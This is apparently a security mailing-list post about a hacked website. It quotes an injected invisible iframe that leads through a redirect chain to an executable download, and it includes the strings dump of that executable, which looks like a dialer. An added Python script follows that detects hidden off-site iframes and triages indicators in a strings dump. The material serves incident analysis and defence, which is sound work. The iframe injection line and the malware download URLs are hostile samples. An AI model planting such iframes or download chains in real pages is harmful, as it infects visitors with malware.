Hi All,

I've only looked at this for about 3 mins, so there isn't a lot to tell.

From a website that looks like someone has hacked it and added an IFRAME to the top of the page:

<iframe FRAMEBORDER="0" width="0" height="0" src="http://213.158.119.103/iframe.php?xid=111"></iframe>

From this frame it gets bounced onto:

http://62.4.84.150/data/start.php?id=111-b&aid=0

then onto:

http://62.4.84.150/data/start.php?id=111-download&aid=0

which then downloads a 17984b exe file.

I've attached a strings output from the exe, and a copy of the exe (password for zip is lamedial).

I hope someone else can shed more light on this than I can.

Cheers,
Daniel B.

--
Daniel Bartlett
danbuk_fd@xxxxxxxxxxxx
Attachment:
lamedial.zip
Description: Zip archive
Strings v2.1 Copyright (C) 1999-2003 Mark Russinovich Systems Internals - www.sysinternals.com EINFO DVCLAL PACKAGEINFO PARAMS MZP This program must be run under Win32 ^B* v[Sljs: StringX Y6M TObject !;l LY9 % 8 $z( PRQ: ]YZ < v ;"u 1+5 d?H ;"u &^w Q782 7CF <_1 x{H ,mu VQA j8V@ Ht GnfBD jJP LOR< ZHQ jg/ Huv 6t9 DY8k5 F8a /n3 1k[ SHY H{n w]j {,! /w)f%: g$t GKu keP -tb +t_${//?xtZXtU0u w%9 i}9 ~ExC[) {; Aar l L xqP m$n^ @~d Z`B 01+O IaY` {e4 +Vlm V$v< -HtG Vr2f %X8 f|C mP0T YY. z7T (k{ a[C- P<T (9h JLv bB_ B7l 'e] w(} tG, .{i 2E;;v $Jj |28u x#t "pNu '#!A okK1Ws ~$P !R: 5^u:J eZm GY?O<X A|; t\; {Ju hik uXJt .pg` "+8A 7t1S P5X w\- r&J| o#u N|* }&Z~") 'FR LrR "O} 2X9 {[@N~ W*Jx L~H +oV# x2u (t; kQR n^S Qx| t>< tS< t^< Px< g(x _(v ^h(<[ khL 9ly CRaB T'9 58vw 7 ge 8Bl @6+u UwUh T \O {]Y$ p'Q 3Z}Yu C$3V +-C ceF [sQ ]ej O>0 8P( viP"U z{? ]ppC, Z)F U[O F** U+\ c)M JO+ 8|"G g[i O"X BZ' =nR &q+E o%Uh /6d <1ZYYd o-6 /Pj@) 6~t s/< p&dS, <]0]6 |4 x 7)$ ($A @[pwZ !x] |xt plh2 d`\ XTP 2LHD @<8$ (, d \r0 TDialParams .1: ulDav TConn orhr etersP l 4}K Loc rops EVpP5 5p95 gWindow .>`9 k"Hw GPa PXY o+w C8X >_R e#0 )ig `1'&cF\= `Pa V%- `P92 hh9{ ^8y g3Up@ F)( ;'' $KW@ 8'% >dJ %=U K5M Ras) Enum sAG 6l" d/1X Sstus #90< HangUpAp< CDevic v`1J qV*idaAN =S v rwapi32.dll =.{ G ->7 @4> r S Sr .y S SDz |Fk dUr /*+ E<(b % HV~2 ~-\dl F3b 8?j/ HYy -zAY: P>#W m(M p'N {~/ CNu 5!HK d~O* r#SG :\> E;,$t uqTYZ CG; H[| D{W x^E +neEL c,-k Vq@ 5`s[+ NgP1 ;l1 5<C/ jd%8 l~Hr :YvE =raD 5(6{ 5;( jM@ /=IH $0, JJ4 0'N 2$$( (hp $$del.ba @Echo off begin if exis t %1 A > nug gotRC %cf {FFB51760-34 4E-4 B18C7AC1D6 3}.mem _!X F"~ 0,rI1I_9k0 Wz# pQ] tHu }Smt EnK iP, |d\% 0IO tPOHh jfT \!x W`@0 c2" l=[ u4E@E ,F#H:+| v:^= |/C `l%Z In.) hBAs SS=Q X0Za xa!, m`P DQ6d !'3Q mod sqR \ x Bdn z$KI PQ\^ i44.( -w( P}biU x>, X,` >`!&# ]6@. k/EG BNDUh3 ;|& ){a KUF |y8M ;1; `=d \U .t& i1z j$X JN0 Q)~ KD#3/ =H3 <tX , X? j60 ?TN j) 7D& ZH$ 2lI ~V' 8?: !j` }GF hHW F\* 4;' %RND%h (Th? 
U0X[ H4X jh" 'Xk Wdw t{oft ware\Micros s\Cur ntV# net t"gs 0xyEnable |Sh \bh g,A<%h"X ]m h l$] h/p\shell Gope# \comma oX' AOL.EXE iexploD &z/ ",S H0! DRA hT^#to $?c' ^72 OG1 =<~ h`1 0K= bIu 0c' e*p }?S @$` #KIt o`E Z@8 9d9 (;j :2&k ~NR Jj< rtPause Cou!%9;Y3DP )ryV UPr fssw 'RL NoM Only; Max eTih/ H1: #^<, CNTR '/* Xt$ y%u /AIIT"F+ 7xr :!g dDm #G`m iX5 8V15 j"S )G! !8Z "d} A?F [9h @9` tZz ![d 0g- i0iJ~ d{\ Goc ;XtG gle[ 0p! $p1& MM0 u1' <mu %&P Ev? ARA MS/ dM% o7n hD99 @q# +,+ @O>n@ `W`sP @T, r*t .mH8% ;9$ b.S };} eCE p@a |7Bk ;L= @Ju cS; OGs oNe v7J VY0 |+B tadN !GcBx 0^C.` pBT rT#? ttwh8 ;tt TP_ .di ?a9 /o7 BUY]~ $(A d,04 8<@D LvPg X\oJ> d"& `_%v l@rK #y $w(9 ;U70\.d )0{, AxW ypH xcc~x /l416 9+9 d4= >x, p>i sYvn 0vC ZpC 88QQ2 t&~ (Cc [QT #sI &=O8 G.l System Init .UType- C.A sag uTool (*YAPIE? _6Oe 5uRa Er5 jLmc c@( -l# Uwk mM#eeuE PIPEM D16 guh hread _dIN Jo/ _=0 i=2} DP0 9678 _=s *GB @,X &u>RL=o ://62.4.8 150 /2t/ ex.php?iG 7l{ T.w tz,$ 02700431 176_47_6@n] 111dJ H11 cpyA WaitF SH@ VirtuIFree Alloc k2K S7ep izvf Z6SeWi Atiibu 0eM E6e phewOf4 LoadKT LErar o"Sho lAd drp _eIn C0s >RHand UnhLd Rtl:w k#P ulGA eTP Key L?, nsl xtA B7l Tt1 eek Mx- Is~ pEch0 oy- UppBu ^B* y@\q 34@3 CODE ra' `DATA @BS i~O )P'e `X|'sr& u A GIu KERNEL32.DLL advapi32.dll oleaut32.dll shell32.dll user32.dll LoadLibraryA GetProcAddress ExitProcess RegCloseKey SysFreeString ShellExecuteA SetTimer dn5
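The post gives two artifacts worth triaging: the injected zero-size iframe and the strings dump of the downloaded executable. The script below is an added example, not code from the poster or from the sample; it shows the two checks a responder would run first. The sample HTML is constructed around the iframe quoted above and assumes the hacked site is www.example.com (the post does not name it); the strings sample is constructed to resemble the legible fragments of the attachment (RAS dial-up API names, a batch-file stub, registry keys, the download host) but is not a copy of it, and the RasHangUp name and the download URL are assumptions for illustration. The "dialer candidate" verdict is a heuristic of this example, not an analysis of the real binary.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlsplit

# Constructed sample page: the injected iframe quoted in the post, plus two
# iframes a site might legitimately carry.  The hacked site is assumed to be
# www.example.com (hypothetical; the post does not name it).
SAMPLE_HTML = """<html><body>
<iframe FRAMEBORDER="0" width="0" height="0" src="http://213.158.119.103/iframe.php?xid=111"></iframe>
<iframe src="/ads.html" width="300" height="250"></iframe>
<iframe src="http://www.example.com/tracker.html" width="0" height="0"></iframe>
<p>Welcome</p></body></html>"""


class _IframeCollector(HTMLParser):
    """Collects the attribute dict of every <iframe> start tag."""

    def __init__(self):
        super().__init__()
        self.iframes = []

    def handle_starttag(self, tag, attrs):
        if tag == "iframe":  # HTMLParser lowercases tag and attribute names
            self.iframes.append({k: (v or "") for k, v in attrs})


def find_hidden_iframes(html, site_host):
    """Return src URLs of iframes that are both invisible (0x0 or CSS-hidden)
    and load from a host other than site_host, i.e. the injection pattern
    described in the post.  Relative src values are treated as on-site."""
    parser = _IframeCollector()
    parser.feed(html)
    hits = []
    for a in parser.iframes:
        src = a.get("src", "")
        host = urlsplit(src).hostname or site_host
        zero_size = any(a.get(d, "").strip().rstrip("px").strip() == "0"
                        for d in ("width", "height"))
        style = a.get("style", "").replace(" ", "").lower()
        css_hidden = "display:none" in style or "visibility:hidden" in style
        if (zero_size or css_hidden) and host.lower() != site_host.lower():
            hits.append(src)
    return hits


# Constructed strings dump (one string per line, as `strings` prints them).
# Not a copy of the attachment: RasHangUp and the URL path are assumed.
STRINGS_SAMPLE = """\
This program must be run under Win32
TDialParams
rasapi32.dll
RasHangUp
del.bat
@Echo off
Software\\Microsoft\\Windows\\CurrentVersion
ProxyEnable
shell\\open\\command
AOL.EXE
http://62.4.84.150/data/start.php?id=111-download&aid=0
KERNEL32.DLL
advapi32.dll
oleaut32.dll
shell32.dll
user32.dll
LoadLibraryA
GetProcAddress
ExitProcess
RegCloseKey
SysFreeString
ShellExecuteA
SetTimer
"""

RAS_RE = re.compile(r"(?:Ras[A-Z]\w*|rasapi32\.dll)$")   # RAS = Windows dial-up API
URL_RE = re.compile(r"https?://[^\s\"'<>]+")
IP_RE = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b")


def triage_strings(dump):
    """Pull network, persistence and dialer indicators out of a strings dump.
    'dialer_candidate' is this example's heuristic: any RAS API reference."""
    lines = [l.strip() for l in dump.splitlines() if l.strip()]
    names = set(lines)
    return {
        "urls": sorted({u for l in lines for u in URL_RE.findall(l)}),
        "ips": sorted({ip for l in lines for ip in IP_RE.findall(l)}),
        "dlls": [l for l in lines if l.lower().endswith(".dll")],
        "registry": [l for l in lines if l.lower().startswith("software\\")
                     or "shell\\open\\command" in l.lower()],
        "ras_api": [l for l in lines if RAS_RE.match(l)],
        "batch_stub": [l for l in lines
                       if l.lower().endswith(".bat") or l.lower().startswith("@echo")],
        # LoadLibraryA + GetProcAddress alongside a tiny import list usually
        # means the real imports are resolved at run time (packed/obfuscated).
        "dynamic_import": {"LoadLibraryA", "GetProcAddress"} <= names,
        "shell_execute": "ShellExecuteA" in names,
        "dialer_candidate": any(RAS_RE.match(l) for l in lines),
    }


if __name__ == "__main__":
    print("hidden off-site iframes:", find_hidden_iframes(SAMPLE_HTML, "www.example.com"))
    for key, val in triage_strings(STRINGS_SAMPLE).items():
        print(f"{key}: {val}")
```

Run against a real page and a real `strings -a` dump, the first function gives you the list of frames to block at the web tier, and the second gives you the hosts to sinkhole and the registry paths to check on an infected machine; a RAS reference next to a `shell\open\command` key is the classic dialer fingerprint (dial a premium number, then hijack the browser launch), but confirm it in a sandbox before treating the heuristic as a verdict.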